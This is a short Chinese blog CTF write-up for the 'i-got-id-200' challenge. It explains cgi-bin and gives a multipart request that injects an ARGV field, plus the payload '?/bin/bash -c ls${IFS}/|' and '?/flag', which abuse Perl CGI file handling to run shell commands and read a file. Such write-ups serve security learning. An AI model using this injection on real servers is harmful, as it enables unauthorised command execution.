i-got-id-200所得
i-got-id-200
writeup#
https://blog.csdn.net/mochu7777777/article/details/104840872
问题#
cgi-bin是什么?#
cgi-bin是为了与主机的程序进行交互的目录,主机在cgi目录先对应着相关的程序,接受从cgi-bin目录网页下传递的值,进行处理。
# apache
/usr/local/apache/cgi
https://blog.csdn.net/weixin_39609623/article/details/86312439
ARGV#
-----------------------------1248478904583 #这一串是边界限定boundary根据自己流量包进行修改
Content-Disposition: form-data; name="file";
Content-Type: application/octet-stream
ARGV
ARGV有何作用
https://www.cnblogs.com/f-ck-need-u/p/9557041.html
ARGV是当前正在处理的文件句柄,传递给param()后,从网页中输入参数,函数进行处理,参数可控。根据cgi-bin的机制,可以运行系统env命令所以
传入payload:?/bin/bash%20-c%20ls${IFS}/|
# ${IFS} shell中的分割符,即空白
# / 转义连接符,将后序的管道符|连接
# | 将前一句的结果作为参数传入
?/flag
/代表目录路径,即根目录下的flag
作者:sovo
出处:https://www.cnblogs.com/Sovohost-43/p/16001577.html
版权:本作品采用「署名-非商业性使用-相同方式共享 4.0 国际」许可协议进行许可。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· Manus的开源复刻OpenManus初探
· AI 智能体引爆开源社区「GitHub 热点速览」
· C#/.NET/.NET Core技术前沿周刊 | 第 29 期(2025年3.1-3.9)
· 从HTTP原因短语缺失研究HTTP/2和HTTP/3的设计差异